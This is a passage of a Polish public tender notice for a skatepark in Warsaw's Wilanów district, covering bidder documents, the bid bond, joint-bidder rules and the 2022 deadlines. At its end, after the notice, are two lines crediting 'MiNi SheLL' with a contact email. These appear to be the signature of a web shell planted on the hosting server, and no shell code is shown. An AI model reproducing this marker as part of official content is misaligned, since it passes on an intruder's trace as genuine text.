wpisie do<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej Rzeczypospolitej Polskiej lub<br/>umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami;<br/>d) potwierdzenie wniesienia wadium, w przypadku wnoszenia wadium w innej dopuszczonej<br/>formie niż pieniężna, dokument wadium należy dołączyć do oferty w oryginale.<br/>e) (jeżeli dotyczy) dokument potwierdzający umocowanie do reprezentowania wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o<br/>współdziałaniu, z której będzie wynikać przedmiotowe umocowanie, pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy. Dokument winien być załączony w formie oryginału lub<br/>odpowiednio poświadczonego odwzorowania.<br/>f) (jeżeli dotyczy) zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy<br/>środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>Uwaga – Nie podlega łączeniu doświadczenie Wykonawcy i doświadczenie podmiotu<br/>udostępniającego zasób. Podmiot, na zasobach którego polega Wykonawca na zasadach<br/>określonych w art. 118 ust. 1 ustawy, musi wykazać samodzielnie, że spełnia warunek określony<br/>w III.B.2 SWZ.<br/>W przypadku gdy Wykonawca, w celu potwierdzenia spełnienia warunków udziału w<br/>postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w ustawie. Wykonawca musi udowodnić Zamawiającemu, że realizując zamówienie będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając<br/>zobowiązanie tych podmiotów lub inny środek dowodowy - potwierdzające oddanie do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia (art. 118 ust. 3<br/>ustawy).<br/>g) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w lit. a powyżej,<br/>także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu.<br/>h) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa,<br/>Wykonawca zobowiązany jest do złożenia wraz z ofertą dowodów, o których mowa w pkt VII B<br/>SWZ.<br/>W przypadku przekazywania dokumentów elektronicznych stanowiących tajemnicę<br/>przedsiębiorstwa z wykorzystaniem Systemu, Wykonawca powinien w okienku dodawania pliku określić TYP DOKUMENTU jako „Tajemnica przedsiębiorstwa&#34; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł (słownie: dziesięć<br/>tysięcy zł 00/100) najpóźniej do dnia, w którym upływa ostateczny termin składania ofert do<br/>godz. 12:00.<br/>2. Wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r.<br/>poz. 310, 836, 1572 ze zm.).<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa powyżej lit. b–<br/>d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.<br/>W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na<br/>konto Zamawiającego (m.st. Warszawa Dzielnica Wilanów) nr 73 10301508 0000 0005 5001<br/>6109 Bank Handlowy w Warszawie S.A., ul. Senatorska 16, 00-923 Warszawa z podaniem w<br/>tytule przelewu: „Przetarg nr 2/WIR/2022 –Realizacja obiektu małej architektury - skateparku<br/>wraz z niezbędną infrastrukturą techniczną na terenie Dzielnicy Wilanów oraz dokładnej nazwy i<br/>adresu Wykonawcy. Kserokopię dowodu wpłaty należy dołączyć do oferty. O uznaniu przez<br/>Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data<br/>wpływu środków na rachunek Zamawiającego.<br/>UWAGA! Kasa Zamawiającego nie przyjmuje wpłat wadium w formie gotówki.<br/>Dokument wadium winien zawierać niżej wymienione elementy:<br/>a. wskazanie Beneficjenta – Beneficjentem musi być m.st. Warszawa Dzielnica Wilanów,<br/>ul. Franciszka Klimczaka 2, 02-797 Warszawa,<br/>b. nazwę dającego zlecenie i jego siedzibę (adres),<br/>c. określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>d. zobowiązanie banku/instytucji ubezpieczeniowej do nieodwołalnego i bezwarunkowego<br/>zapłacenia całości kwoty zobowiązania na pierwsze pisemne żądanie zapłaty Zamawiającego<br/>wraz z oświadczeniem, że wypłata nastąpi gdy:<br/>- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z<br/>przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub<br/>oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3,<br/>co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako<br/>najkorzystniejszej;<br/>- Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w<br/>ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących<br/>po stronie wykonawcy, którego oferta została wybrana.zapisy odnośnie czasu jej trwania,<br/>f. zapisy odnośnie zasad wygaśnięcia,<br/>g. okres ważności, obejmujący przynajmniej cały okres związania ofertą.<br/>3. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności: 1) upływu terminu związania ofertą; 2) zawarcia umowy w<br/>sprawie zamówienia publicznego; 3) unieważnienia postępowania o udzielenie zamówienia, z<br/>wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie<br/>upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez podmioty występujące wspólnie:<br/>a) podmioty występujące wspólnie zobowiązane są do ustanowienia w formie pisemnej<br/>Pełnomocnika reprezentującego ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>b) dokument potwierdzający umocowanie do reprezentowania należy dołączyć do oferty w<br/>formie oryginału lub cyfrowego odwzorowania pełnomocnictwa sporządzonego w postaci<br/>papierowej, poświadczonego zgodnie z obowiązującymi przepisami<br/>W/w dokument powinien zawierać w szczególności wskazanie:<br/>postępowania o zamówienie publiczne, którego dotyczy,<br/>wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/>ustanowionego Pełnomocnika oraz zakresu jego umocowania;<br/>c) korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem,<br/>którego adres należy wpisać w formularzu oferty;<br/>d) Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę podmiotów występujących wspólnie;<br/>e) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- warunek określony w III.B.2.2.A SWZ musi być spełniony w całości przez co najmniej jednego z<br/>Wykonawców wspólnie ubiegających się o zamówienie (jeden lub każdy z podmiotów musi<br/>posiadać samodzielnie wymagane doświadczenie, nie podlega łączeniu doświadczenie<br/>Wykonawców wspólnie ubiegających się o zamówienie)<br/>Uwaga<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane (art. 117 ust. 3). Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>wykonają poszczególni wykonawcy.<br/>f) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu z powodu przesłanek, o których mowa w art. 108 ust. 1 ustawy.<br/>Oświadczenia, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w<br/>zakresie jego dotyczącym. Dokumenty te potwierdzają spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Określone w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-08 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com